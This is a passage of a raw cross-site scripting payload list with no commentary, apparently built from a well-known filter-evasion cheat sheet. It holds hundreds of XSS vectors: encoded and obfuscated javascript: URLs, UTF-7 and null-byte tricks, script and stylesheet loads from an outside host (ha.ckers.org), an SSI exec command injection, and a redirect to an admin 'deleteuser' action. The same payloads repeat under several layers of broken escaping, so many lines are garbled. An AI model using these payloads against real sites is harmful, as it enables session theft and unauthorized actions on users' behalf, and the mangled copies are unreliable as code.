ID=\u0026quot;xss\u0026quot;\u0026gt;\u0026lt;I\u0026gt;\u0026lt;B\u0026gt;\u0026lt;IMG SRC=\u0026quot;javas\u0026lt;!-- --\u0026gt;cript:alert(\u0026apos;XSS\u0026apos;)\u0026quot;\u0026gt;\u0026lt;/B\u0026gt;\u0026lt;/I\u0026gt;\u0026lt;/XML\u0026gt;\n\u0026lt;XML SRC=\u0026quot;http://ha.ckers.org/xsstest.xml\u0026quot; ID=I\u0026gt;\u0026lt;/XML\u0026gt;\n\u0026lt;HTML\u0026gt;\u0026lt;BODY\u0026gt;\n\u0026lt;!--[if gte IE 4]\u0026gt;\n\u0026lt;META HTTP-EQUIV=\u0026quot;Set-Cookie\u0026quot; Content=\u0026quot;USERID=\u0026lt;SCRIPT\u0026gt;alert(\u0026apos;XSS\u0026apos;)\u0026lt;/SCRIPT\u0026gt;\u0026quot;\u0026gt;\n\u0026lt;XSS STYLE=\u0026quot;behavior: url(http://ha.ckers.org/xss.htc);\u0026quot;\u0026gt;\n\u0026lt;SCRIPT SRC=\u0026quot;http://ha.ckers.org/xss.jpg\u0026quot;\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;!--#exec cmd=\u0026quot;/bin/echo \u0026apos;\u0026lt;SCRIPT SRC\u0026apos;\u0026quot;--\u0026gt;\u0026lt;!--#exec cmd=\u0026quot;/bin/echo \u0026apos;=http://ha.ckers.org/xss.js\u0026gt;\u0026lt;/SCRIPT\u0026gt;\u0026apos;\u0026quot;--\u0026gt;\n\u0026lt;? echo(\u0026apos;\u0026lt;SCR)\u0026apos;;\n\u0026lt;BR SIZE=\u0026quot;\u0026amp;{alert(\u0026apos;XSS\u0026apos;)}\u0026quot;\u0026gt;\n\u0026lt;IMG SRC=JaVaScRiPt:alert(\u0026apos;XSS\u0026apos;)\u0026gt;\n\u0026lt;IMG SRC=javascript:alert(\u0026amp;quot;XSS\u0026amp;quot;)\u0026gt;\n\u0026lt;IMG SRC=`javascript:alert(\u0026quot;RSnake says, \u0026apos;XSS\u0026apos;\u0026quot;)`\u0026gt;\n\u0026lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))\u0026gt;\n\u0026lt;IMG SRC=\u0026amp;#106;\u0026amp;#97;\u0026amp;#118;\u0026amp;#97;\u0026amp;#115;\u0026amp;#99;\u0026amp;#114;\u0026amp;#105;\u0026amp;#112;\u0026amp;#116;\u0026amp;#58;\u0026amp;#97;\u0026amp;#108;\u0026amp;#101;\u0026amp;#114;\u0026amp;#116;\u0026amp;#40;\u0026amp;#39;\u0026amp;#88;\u0026amp;#83;\u0026amp;#83;\u0026amp;#39;\u0026amp;#41;\u0026gt;\n\u0026lt;IMG SRC=\u0026amp;#0000106\u0026amp;#0000097\u0026amp;#0000118\u0026amp;#0000097\u0026amp;#0000115\u0026amp;#0000099\u0026amp;#0000114\u0026amp;#0000105\u0026amp;#0000112\u0026amp;#0000116\u0026amp;#0000058\u0026amp;#0000097\u0026amp;#0000108\u0026amp;#0000101\u0026amp;#0000114\u0026amp;#0000116\u0026amp;#0000040\u0026amp;#0000039\u0026amp;#0000088\u0026amp;#0000083\u0026amp;#0000083\u0026amp;#0000039\u0026amp;#0000041\u0026gt;\n\u0026lt;DIV STYLE=\u0026quot;background-image:\\0075\\0072\\006C\\0028\u0026apos;\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029\u0026apos;\\0029\u0026quot;\u0026gt;\n\u0026lt;IMG SRC=\u0026amp;#x6A\u0026amp;#x61\u0026amp;#x76\u0026amp;#x61\u0026amp;#x73\u0026amp;#x63\u0026amp;#x72\u0026amp;#x69\u0026amp;#x70\u0026amp;#x74\u0026amp;#x3A\u0026amp;#x61\u0026amp;#x6C\u0026amp;#x65\u0026amp;#x72\u0026amp;#x74\u0026amp;#x28\u0026amp;#x27\u0026amp;#x58\u0026amp;#x53\u0026amp;#x53\u0026amp;#x27\u0026amp;#x29\u0026gt;\n\u0026lt;HEAD\u0026gt;\u0026lt;META HTTP-EQUIV=\u0026quot;CONTENT-TYPE\u0026quot; CONTENT=\u0026quot;text/html; charset=UTF-7\u0026quot;\u0026gt; \u0026lt;/HEAD\u0026gt;+ADw-SCRIPT+AD4-alert(\u0026apos;XSS\u0026apos;);+ADw-/SCRIPT+AD4-\n\\\u0026quot;;alert(\u0026apos;XSS\u0026apos;);//\n\u0026lt;/TITLE\u0026gt;\u0026lt;SCRIPT\u0026gt;alert(\"XSS\");\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;STYLE\u0026gt;@im\\port\u0026apos;\\ja\\vasc\\ript:alert(\u0026quot;XSS\u0026quot;)\u0026apos;;\u0026lt;/STYLE\u0026gt;\n\u0026lt;IMG SRC=\u0026quot;jav\u0026#x09;ascript:alert(\u0026apos;XSS\u0026apos;);\u0026quot;\u0026gt;\n\u0026lt;IMG SRC=\u0026quot;jav\u0026amp;#x09;ascript:alert(\u0026apos;XSS\u0026apos;);\u0026quot;\u0026gt;\n\u0026lt;IMG SRC=\u0026quot;jav\u0026amp;#x0A;ascript:alert(\u0026apos;XSS\u0026apos;);\u0026quot;\u0026gt;\n\u0026lt;IMG SRC=\u0026quot;jav\u0026amp;#x0D;ascript:alert(\u0026apos;XSS\u0026apos;);\u0026quot;\u0026gt;\n\u0026lt;IMG\u0026#x0D;SRC\u0026#x0D;=\u0026#x0D;\u0026quot;\u0026#x0D;j\u0026#x0D;a\u0026#x0D;v\u0026#x0D;a\u0026#x0D;s\u0026#x0D;c\u0026#x0D;r\u0026#x0D;i\u0026#x0D;p\u0026#x0D;t\u0026#x0D;:\u0026#x0D;a\u0026#x0D;l\u0026#x0D;e\u0026#x0D;r\u0026#x0D;t\u0026#x0D;(\u0026#x0D;\u0026apos;\u0026#x0D;X\u0026#x0D;S\u0026#x0D;S\u0026#x0D;\u0026apos;\u0026#x0D;)\u0026#x0D;\u0026quot;\u0026#x0D;\u0026gt;\u0026#x0D;\nperl -e \u0026apos;print \u0026quot;\u0026lt;IMG SRC=java\\0script:alert(\u0026quot;XSS\u0026quot;)\u003e\u0026quot;;\u0026apos;\u0026gt; out\nperl -e \u0026apos;print \u0026quot;\u0026amp;\u0026lt;SCR\\0IPT\u0026gt;alert(\u0026quot;XSS\u0026quot;)\u0026lt;/SCR\\0IPT\u0026gt;\u0026quot;;\u0026apos; \u0026gt; out\n\u0026lt;IMG SRC=\u0026quot; \u0026amp;#14;  javascript:alert(\u0026apos;XSS\u0026apos;);\u0026quot;\u0026gt;\n\u0026lt;SCRIPT/XSS SRC=\u0026quot;http://ha.ckers.org/xss.js\u0026quot;\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;BODY onload!#$%\u0026amp;()*~+-_.,:;?@[/|\\]^`=alert(\u0026quot;XSS\u0026quot;)\u0026gt;\n\u0026lt;SCRIPT SRC=http://ha.ckers.org/xss.js\n\u0026lt;SCRIPT SRC=//ha.ckers.org/.j\u0026gt;\n\u0026lt;IMG SRC=\u0026quot;javascript:alert(\u0026apos;XSS\u0026apos;)\u0026quot;\n\u0026lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html \u0026lt;\n\u0026lt;\u0026lt;SCRIPT\u0026gt;alert(\u0026quot;XSS\u0026quot;);//\u0026lt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;IMG \u0026quot;\u0026quot;\u0026quot;\u0026gt;\u0026lt;SCRIPT\u0026gt;alert(\u0026quot;XSS\u0026quot;)\u0026lt;/SCRIPT\u0026gt;\u0026quot;\u0026gt;\n\u0026lt;SCRIPT\u0026gt;a=/XSS/\n\u0026lt;SCRIPT a=\u0026quot;\u0026gt;\u0026quot; SRC=\u0026quot;http://ha.ckers.org/xss.js\u0026quot;\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT =\u0026quot;blah\u0026quot; SRC=\u0026quot;http://ha.ckers.org/xss.js\u0026quot;\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT a=\u0026quot;blah\u0026quot; \u0026apos;\u0026apos; SRC=\u0026quot;http://ha.ckers.org/xss.js\u0026quot;\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT \u0026quot;a=\u0026apos;\u0026gt;\u0026apos;\u0026quot; SRC=\u0026quot;http://ha.ckers.org/xss.js\u0026quot;\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT a=`\u0026gt;` SRC=\u0026quot;http://ha.ckers.org/xss.js\u0026quot;\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT\u0026gt;document.write(\u0026quot;\u0026lt;SCRI\u0026quot;);\u0026lt;/SCRIPT\u0026gt;PT SRC=\u0026quot;http://ha.ckers.org/xss.js\u0026quot;\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT a=\u0026quot;\u003e\u0026apos;\u003e\u0026quot; SRC=\u0026quot;http://ha.ckers.org/xss.js\u0026quot;\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;A HREF=\u0026quot;http://66.102.7.147/\u0026quot;\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\u0026quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\u0026quot;\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\u0026quot;http://1113982867/\u0026quot;\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\u0026quot;http://0x42.0x0000066.0x7.0x93/\u0026quot;\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\u0026quot;http://0102.0146.0007.00000223/\u0026quot;\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\u0026quot;h\u0026#x0A;tt\u0026#09;p://6\u0026amp;#09;6.000146.0x7.147/\u0026quot;\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\u0026quot;//www.google.com/\u0026quot;\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\u0026quot;//google\u0026quot;\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\u0026quot;http://ha.ckers.org@google\u0026quot;\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\u0026quot;http://google:ha.ckers.org\u0026quot;\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\u0026quot;http://google.com/\u0026quot;\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\u0026quot;http://www.google.com./\u0026quot;\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\u0026quot;javascript:document.location=\u0026apos;http://www.google.com/\u0026apos;\u0026quot;\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\u0026quot;http://www.gohttp://www.google.com/ogle.com/\u0026quot;\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026quot;\u0026gt;\u0026lt;BODY onload!#$%\u0026amp;()*~+-_.,:;?@[/|\\]^`=alert(\u0026quot;XSS\u0026quot;)\u0026gt;\n\u0026lt;/script\u0026gt;\u0026lt;script\u0026gt;alert(1)\u0026lt;/script\u0026gt;\n\u0026lt;/br style=a:expression(alert())\u0026gt;\n\u0026lt;scrscriptipt\u0026gt;alert(1)\u0026lt;/scrscriptipt\u0026gt;\n\u0026lt;br size=\\\u0026quot;\u0026amp;{alert(\u0026#039;XSS\u0026#039;)}\\\u0026quot;\u0026gt;\nperl -e \u0026#039;print \\\u0026quot;\u0026lt;IMG SRC=java\\0script:alert(\\\u0026quot;XSS\\\u0026quot;)\u0026gt;\\\u0026quot;;\u0026#039; \u0026gt; out\nperl -e \u0026#039;print \\\u0026quot;\u0026lt;SCR\\0IPT\u0026gt;alert(\\\u0026quot;XSS\\\u0026quot;)\u0026lt;/SCR\\0IPT\u0026gt;\\\u0026quot;;\u0026#039; \u0026gt; out\n';;alert(String.fromCharCode(88,83,83))//\\';;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//\\\";;alert(String.fromCharCode(88,83,83))//--\u003e;\u003c;/SCRIPT\u003e;\";\u003e;';\u003e;\u003c;SCRIPT\u003e;alert(String.fromCharCode(88,83,83))\u003c;/SCRIPT\u003e;\n';';;!--\";\u003c;XSS\u003e;=\u0026;{()}\n\u003c;SCRIPT\u003e;alert(';XSS';)\u003c;/SCRIPT\u003e;\n\u003c;SCRIPT SRC=http://ha.ckers.org/xss.js\u003e;\u003c;/SCRIPT\u003e;\n\u003c;SCRIPT\u003e;alert(String.fromCharCode(88,83,83))\u003c;/SCRIPT\u003e;\n\u003c;BASE HREF=\";javascript:alert(';XSS';);//\";\u003e;\n\u003c;BGSOUND SRC=\";javascript:alert(';XSS';);\";\u003e;\n\u003c;BODY BACKGROUND=\";javascript:alert(';XSS';);\";\u003e;\n\u003c;BODY ONLOAD=alert(';XSS';)\u003e;\n\u003c;DIV STYLE=\";background-image: url(javascript:alert(';XSS';))\";\u003e;\n\u003c;DIV STYLE=\";background-image: url(\u0026;#1;javascript:alert(';XSS';))\";\u003e;\n\u003c;DIV STYLE=\";width: expression(alert(';XSS';));\";\u003e;\n\u003c;FRAMESET\u003e;\u003c;FRAME SRC=\";javascript:alert(';XSS';);\";\u003e;\u003c;/FRAMESET\u003e;\n\u003c;IFRAME SRC=\";javascript:alert(';XSS';);\";\u003e;\u003c;/IFRAME\u003e;\n\u003c;INPUT TYPE=\";IMAGE\"; SRC=\";javascript:alert(';XSS';);\";\u003e;\n\u003c;IMG SRC=\";javascript:alert(';XSS';);\";\u003e;\n\u003c;IMG SRC=javascript:alert(';XSS';)\u003e;\n\u003c;IMG DYNSRC=\";javascript:alert(';XSS';);\";\u003e;\n\u003c;IMG LOWSRC=\";javascript:alert(';XSS';);\";\u003e;\n\u003c;IMG SRC=\";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\";\u003e;\nRedirect 302 /a.jpg http://victimsite.com/admin.asp\u0026;deleteuser\nexp/*\u003c;XSS STYLE=';no\\xss:noxss(\";*//*\";);\n\u003c;STYLE\u003e;li {list-style-image: url(\";javascript:alert(\u0026#39;XSS\u0026#39;)\";);}\u003c;/STYLE\u003e;\u003c;UL\u003e;\u003c;LI\u003e;XSS\n\u003c;IMG SRC=';vbscript:msgbox(\";XSS\";)';\u003e;\n\u003c;LAYER SRC=\";http://ha.ckers.org/scriptlet.html\";\u003e;\u003c;/LAYER\u003e;\n\u003c;IMG SRC=\";livescript:[code]\";\u003e;\n%BCscript%BEalert(%A2XSS%A2)%BC/script%BE\n\u003c;META HTTP-EQUIV=\";refresh\"; CONTENT=\";0;url=javascript:alert(';XSS';);\";\u003e;\n\u003c;META HTTP-EQUIV=\";refresh\"; CONTENT=\";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\";\u003e;\n\u003c;META HTTP-EQUIV=\";refresh\"; CONTENT=\";0; URL=http://;URL=javascript:alert(';XSS';);\";\u003e;\n\u003c;IMG SRC=\";mocha:[code]\";\u003e;\n\u003c;OBJECT TYPE=\";text/x-scriptlet\"; DATA=\";http://ha.ckers.org/scriptlet.html\";\u003e;\u003c;/OBJECT\u003e;\n\u003c;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389\u003e;\u003c;param name=url value=javascript:alert(';XSS';)\u003e;\u003c;/OBJECT\u003e;\n\u003c;EMBED SRC=\";http://ha.ckers.org/xss.swf\"; AllowScriptAccess=\";always\";\u003e;\u003c;/EMBED\u003e;\na=\";get\";;\u0026;#10;b=\";URL(\";\";;\u0026;#10;c=\";javascript:\";;\u0026;#10;d=\";alert(';XSS';);\";)\";;\u0026#10;eval(a+b+c+d);\n\u003c;STYLE TYPE=\";text/javascript\";\u003e;alert(';XSS';);\u003c;/STYLE\u003e;\n\u003c;IMG STYLE=\";xss:expr/*XSS*/ession(alert(';XSS';))\";\u003e;\n\u003c;XSS STYLE=\";xss:expression(alert(';XSS';))\";\u003e;\n\u003c;STYLE\u003e;.XSS{background-image:url(\";javascript:alert(';XSS';)\";);}\u003c;/STYLE\u003e;\u003c;A CLASS=XSS\u003e;\u003c;/A\u003e;\n\u003c;STYLE type=\";text/css\";\u003e;BODY{background:url(\";javascript:alert(';XSS';)\";)}\u003c;/STYLE\u003e;\n\u003c;LINK REL=\";stylesheet\"; HREF=\";javascript:alert(';XSS';);\";\u003e;\n\u003c;LINK REL=\";stylesheet\"; HREF=\";http://ha.ckers.org/xss.css\";\u003e;\n\u003c;STYLE\u003e;@import';http://ha.ckers.org/xss.css';;\u003c;/STYLE\u003e;\n\u003c;META HTTP-EQUIV=\";Link\"; Content=\";\u003c;http://ha.ckers.org/xss.css\u003e;; REL=stylesheet\";\u003e;\n\u003c;STYLE\u003e;BODY{-moz-binding:url(\";http://ha.ckers.org/xssmoz.xml#xss\";)}\u003c;/STYLE\u003e;\n\u003c;TABLE BACKGROUND=\";javascript:alert(';XSS';)\";\u003e;\u003c;/TABLE\u003e;\n\u003c;TABLE\u003e;\u003c;TD BACKGROUND=\";javascript:alert(';XSS';)\";\u003e;\u003c;/TD\u003e;\u003c;/TABLE\u003e;\n\u003c;HTML xmlns:xss\u003e;\n\u003c;XML ID=I\u003e;\u003c;X\u003e;\u003c;C\u003e;\u003c;![CDATA[\u003c;IMG SRC=\";javas]]\u003e;\u003c;![CDATA[cript:alert(';XSS';);\";\u003e;]]\u003e;\n\u003c;XML ID=\";xss\";\u003e;\u003c;I\u003e;\u003c;B\u003e;\u003c;IMG SRC=\";javas\u003c;!-- --\u003e;cript:alert(';XSS';)\";\u003e;\u003c;/B\u003e;\u003c;/I\u003e;\u003c;/XML\u003e;\n\u003c;XML SRC=\";http://ha.ckers.org/xsstest.xml\"; ID=I\u003e;\u003c;/XML\u003e;\n\u003c;HTML\u003e;\u003c;BODY\u003e;\n\u003c;!--[if gte IE 4]\u003e;\n\u003c;META HTTP-EQUIV=\";Set-Cookie\"; Content=\";USERID=\u003c;SCRIPT\u003e;alert(';XSS';)\u003c;/SCRIPT\u003e;\";\u003e;\n\u003c;XSS STYLE=\";behavior: url(http://ha.ckers.org/xss.htc);\";\u003e;\n\u003c;SCRIPT SRC=\";http://ha.ckers.org/xss.jpg\";\u003e;\u003c;/SCRIPT\u003e;\n\u003c;!--#exec cmd=\";/bin/echo ';\u003c;SCRIPT SRC';\";--\u003e;\u003c;!--#exec cmd=\";/bin/echo ';=http://ha.ckers.org/xss.js\u003e;\u003c;/SCRIPT\u003e;';\";--\u003e;\n\u003c;? echo(';\u003c;SCR)';;\n\u003c;BR SIZE=\";\u0026;{alert(';XSS';)}\";\u003e;\n\u003c;IMG SRC=JaVaScRiPt:alert(';XSS';)\u003e;\n\u003c;IMG SRC=javascript:alert(\u0026;quot;XSS\u0026;quot;)\u003e;\n\u003c;IMG SRC=`javascript:alert(\";RSnake says, ';XSS';\";)`\u003e;\n\u003c;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))\u003e;\n\u003c;IMG RC=\u0026;#106;\u0026;#97;\u0026;#118;\u0026;#97;\u0026;#115;\u0026;#99;\u0026;#114;\u0026;#105;\u0026;#112;\u0026;#116;\u0026;#58;\u0026;#97;\u0026;#108;\u0026;#101;\u0026;#114;\u0026;#116;\u0026;#40;\u0026;#39;\u0026;#88;\u0026;#83;\u0026;#83;\u0026;#39;\u0026;#41;\u003e;\n\u003c;IMG RC=\u0026;#0000106\u0026;#0000097\u0026;#0000118\u0026;#0000097\u0026;#0000115\u0026;#0000099\u0026;#0000114\u0026;#0000105\u0026;#0000112\u0026;#0000116\u0026;#0000058\u0026;#0000097\u0026;#0000108\u0026;#0000101\u0026;#0000114\u0026;#0000116\u0026;#0000040\u0026;#0000039\u0026;#0000088\u0026;#0000083\u0026;#0000083\u0026;#0000039\u0026;#0000041\u003e;\n\u003c;DIV STYLE=\";background-image:\\0075\\0072\\006C\\0028';\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.10530053\\0027\\0029';\\0029\";\u003e;\n\u003c;IMG SRC=\u0026;#x6A\u0026;#x61\u0026;#x76\u0026;#x61\u0026;#x73\u0026;#x63\u0026;#x72\u0026;#x69\u0026;#x70\u0026;#x74\u0026;#x3A\u0026;#x61\u0026;#x6C\u0026;#x65\u0026;#x72\u0026;#x74\u0026;#x28\u0026;#x27\u0026;#x58\u0026;#x53\u0026;#x53\u0026;#x27\u0026;#x29\u003e;\n\u003c;HEAD\u003e;\u003c;META HTTP-EQUIV=\";CONTENT-TYPE\"; CONTENT=\";text/html; charset=UTF-7\";\u003e; \u003c;/HEAD\u003e;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-\n\\\";;alert(';XSS';);//\n\u003c;/TITLE\u003e;\u003c;SCRIPT\u003e;alert(\"XSS\");\u003c;/SCRIPT\u003e;\n\u003c;STYLE\u003e;@im\\port';\\ja\\vasc\\ript:alert(\";XSS\";)';;\u003c;/STYLE\u003e;\n\u003c;IMG SRC=\";jav\u0026#x09;ascript:alert(';XSS';);\";\u003e;\n\u003c;IMG SRC=\";jav\u0026;#x09;ascript:alert(';XSS';);\";\u003e;\n\u003c;IMG SRC=\";jav\u0026;#x0A;ascript:alert(';XSS';);\";\u003e;\n\u003c;IMG SRC=\";jav\u0026;#x0D;ascript:alert(';XSS';);\";\u003e;\n\u003c;IMG\u0026#x0D;SRC\u0026#x0D;=\u0026#x0D;\";\u0026#x0D;j\u0026#x0D;a\u0026#x0D;v\u0026#x0D;a\u0026#x0D;s\u0026#x0D;c\u0026#x0D;r\u0026#x0D;i\u0026#x0D;p\u0026#x0D;t\u0026#x0D;:\u0026#x0D;a\u0026#x0D;l\u0026#x0D;e\u0026#x0D;r\u0026#x0D;t\u0026#x0D;\u0026#x0D;';\u0026#x0D;X\u0026#x0D;S\u0026#x0D;S\u0026#x0D;';\u0026#x0D;)\u0026#x0D;\";\u0026#x0D;\u003e;\u0026#x0D;\nperl -e ';print \";\u003c;IM SRC=java\\0script:alert(\";XSS\";)\u003e\";;';\u003e; out\nperl -e ';print \";\u0026;\u003c;SCR\\0IPT\u003e;alert(\";XSS\";)\u003c;/SCR\\0IPT\u003e;\";;'; \u003e; out\n\u003c;IMG SRC=\"; \u0026;#14;  javascript:alert(';XSS';);\";\u003e;\n\u003c;SCRIPT/XSS SRC=\";http://ha.ckers.org/xss.js\";\u003e;\u003c;/SCRIPT\u003e;\n\u003c;BODY onload!#$%\u0026;()*~+-_.,:;?@[/|\\]^`=alert(\";XSS\";)\u003e;\n\u003c;SCRIPT SRC=http://ha.ckers.org/xss.js\n\u003c;SCRIPT SRC=//ha.ckers.org/.j\u003e;\n\u003c;IMG SRC=\";javascript:alert(';XSS';)\";\n\u003c;IFRAME SRC=http://ha.ckers.org/scriptlet.html \u003c;\n\u003c;\u003c;SCRIPT\u003e;alert(\";XSS\";);//\u003c;\u003c;/SCRIPT\u003e;\n\u003c;IMG \";\";\";\u003e;\u003c;SCRIPT\u003e;alert(\";XSS\";)\u003c;/SCRIPT\u003e;\";\u003e;\n\u003c;SCRIPT\u003e;a=/XSS/\n\u003c;SCRIPT a=\";\u003e;\"; SRC=\";http://ha.ckers.org/xss.js\";\u003e;\u003c;/SCRIPT\u003e;\n\u003c;SCRIPT =\";blah\"; SRC=\";http://ha.ckers.org/xss.js\";\u003e;\u003c;/SCRIPT\u003e;\n\u003c;SCRIPT a=\";blah\"; ';'; SRC=\";http://ha.ckers.org/xss.js\";\u003e;\u003c;/SCRIPT\u003e;\n\u003c;SCRIPT \";a=';\u003e;';\"; SRC=\";http://ha.ckers.org/xss.js\";\u003e;\u003c;/SCRIPT\u003e;\n\u003c;SCRIPT a=`\u003e;` SRC=\";http://ha.ckers.org/xss.js\";\u003e;\u003c;/SCRIPT\u003e;\n\u003c;SCRIPT\u003e;document.write(\";\u003c;SCRI\";);\u003c;/SCRIPT\u003e;PT SRC=\";http://ha.ckers.org/xss.js\";\u003e;\u003c;/SCRIPT\u003e;\n\u003c;SCRIPT a=\";\u003e';\u003e\"; SRC=\";http://ha.ckers.org/xss.js\";\u003e;\u003c;/SCRIPT\u003e;\n\u003c;A HREF=\";http://66.102.7.147/\";\u003e;XSS\u003c;/A\u003e;\n\u003c;A HREF=\";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\";\u003e;XSS\u003c;/A\u003e;\n\u003c;A HREF=\";http://1113982867/\";\u003e;XSS\u003c;/A\u003e;\n\u003c;A HREF=\";http://0x42.0x0000066.0x7.0x93/\";\u003e;XSS\u003c;/A\u003e;\n\u003c;A HREF=\";http://0102.0146.0007.00000223/\";\u003e;XSS\u003c;/A\u003e;\n\u003c;A HREF=\";h\u0026#x0A;tt\u0026#09;p://6\u0026;#09;6.000146.0x7.147/\";\u003e;XSS\u003c;/A\u003e;\n\u003c;A HREF=\";//www.google.com/\";\u003e;XSS\u003c;/A\u003e;\n\u003c;A HREF=\";//google\";\u003e;XSS\u003c;/A\u003e;\n\u003c;A HREF=\";http://ha.ckers.org@google\";\u003e;XSS\u003c;/A\u003e;\n\u003c;A HREF=\";http://google:ha.ckers.org\";\u003e;XSS\u003c;/A\u003e;\n\u003c;A HREF=\";http://google.com/\";\u003e;XSS\u003c;/A\u003e;\n\u003c;A HREF=\";http://www.google.com./\";\u003e;XSS\u003c;/A\u003e;\n\u003c;A HREF=\";javascript:document.location=';http://www.google.com/';\";\u003e;XSS\u003c;/A\u003e;\n\u003c;A HREF=\";http://www.gohttp://www.google.com/ogle.com/\";\u003e;XSS\u003c;/A\u003e;\n\u003cscript\u003edocument.vulnerable=true;\u003c/script\u003e\n\u003cimg SRC=\"jav ascript:document.vulnerable=true;\"\u003e\n\u003cimg SRC=\"javascript:document.vulnerable=true;\"\u003e\n\u003cimg SRC=\" \u0026#14; javascript:document.vulnerable=true;\"\u003e\n\u003cbody onload!#$%\u0026()*~+-_.,:;?@[/|\\]^`=document.vulnerable=true;\u003e\n\u003c\u003cSCRIPT\u003edocument.vulnerable=true;//\u003c\u003c/SCRIPT\u003e\n\u003cscript \u003cB\u003edocument.vulnerable=true;\u003c/script\u003e\n\u003cimg SRC=\"javascript:document.vulnerable=true;\"\n\u003ciframe src=\"javascript:document.vulnerable=true; \u003c\n\u003cscript\u003ea=/XSS/\\ndocument.vulnerable=true;\u003c/script\u003e\n\\\";document.vulnerable=true;;//\n\u003c/title\u003e\u003cSCRIPT\u003edocument.vulnerable=true;\u003c/script\u003e\n\u003cinput TYPE=\"IMAGE\" SRC=\"javascript:document.vulnerable=true;\"\u003e\n\u003cbody BACKGROUND=\"javascript:document.vulnerable=true;\"\u003e\n\u003cbody ONLOAD=document.vulnerable=true;\u003e\n\u003cimg DYNSRC=\"javascript:document.vulnerable=true;\"\u003e\n\u003cimg LOWSRC=\"javascript:document.vulnerable=true;\"\u003e\n\u003cbgsound SRC=\"javascript:document.vulnerable=true;\"\u003e\n\u003cbr SIZE=\"\u0026{document.vulnerable=true}\"\u003e\n\u003cLAYER SRC=\"javascript:document.vulnerable=true;\"\u003e\u003c/LAYER\u003e\n\u003clink REL=\"stylesheet\" HREF=\"javascript:document.vulnerable=true;\"\u003e\n\u003cstyle\u003eli {list-style-image: url(\"javascript:document.vulnerable=true;\");\u003c/STYLE\u003e\u003cUL\u003e\u003cLI\u003eXSS\n\u003cimg SRC='vbscript:document.vulnerable=true;'\u003e\n1script3document.vulnerable=true;1/script3\n\u003cmeta HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:document.vulnerable=true;\"\u003e\n\u003cmeta HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:document.vulnerable=true;\"\u003e\n\u003cIFRAME SRC=\"javascript:document.vulnerable=true;\"\u003e\u003c/iframe\u003e\n\u003cFRAMESET\u003e\u003cFRAME SRC=\"javascript:document.vulnerable=true;\"\u003e\u003c/frameset\u003e\n\u003ctable BACKGROUND=\"javascript:document.vulnerable=true;\"\u003e\n\u003ctable\u003e\u003cTD BACKGROUND=\"javascript:document.vulnerable=true;\"\u003e\n\u003cdiv STYLE=\"background-image: url(javascript:document.vulnerable=true;)\"\u003e\n\u003cdiv STYLE=\"background-image: url(\u0026#1;javascript:document.vulnerable=true;)\"\u003e\n\u003cdiv STYLE=\"width: expression(document.vulnerable=true);\"\u003e\n\u003cstyle\u003e@im\\port'\\ja\\vasc\\ript:document.vulnerable=true';\u003c/style\u003e\n\u003cimg STYLE=\"xss:expr/*XSS*/ession(document.vulnerable=true)\"\u003e\n\u003cXSS STYLE=\"xss:expression(document.vulnerable=true)\"\u003e\nexp/*\u003cA STYLE='no\\xss:noxss(\"*//*\");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'\u003e\n\u003cstyle TYPE=\"text/javascript\"\u003edocument.vulnerable=true;\u003c/style\u003e\n\u003cstyle\u003e.XSS{background-image:url(\"javascript:document.vulnerable=true\");}\u003c/STYLE\u003e\u003cA CLASS=XSS\u003e\u003c/a\u003e\n\u003cstyle type=\"text/css\"\u003eBODY{background:url(\"javascript:document.vulnerable=true\")}\u003c/style\u003e\n\u003c!--[if gte IE 4]\u003e\u003cSCRIPT\u003edocument.vulnerable=true;\u003c/SCRIPT\u003e\u003c![endif]--\u003e\n\u003cbase HREF=\"javascript:document.vulnerable=true;//\"\u003e\n\u003cOBJECT 